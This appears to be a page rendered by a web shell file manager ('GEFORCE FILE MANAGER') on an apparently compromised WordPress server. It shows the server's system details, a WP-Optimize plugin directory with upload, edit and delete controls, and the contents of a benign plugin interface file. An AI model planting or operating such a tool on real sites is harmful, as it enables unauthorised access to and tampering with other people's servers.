[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
includes
/
tables
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 class-wp-optimize-table-404-detector.php
1,317 B
SET
[ EDIT ]
|
[ DEL ]
📄 interface-wp-optimize-table-interface.php
619 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: interface-wp-optimize-table-interface.php
<?php if (!defined('ABSPATH')) die('No direct access allowed'); if (!interface_exists('WP_Optimize_Table_Interface')) : interface WP_Optimize_Table_Interface { /** * Return the table name for this object * * @return string */ public function get_table_name(): string; /** * Return an array with `dbDelta()` field strings (and keys) * [ * fields => [name => SQL], * keys => [name => SQL] * ] * * @return array */ public function describe(): array; /** * Returns singleton instance * * @return WP_Optimize_Table_Interface */ public static function get_instance(); } endif;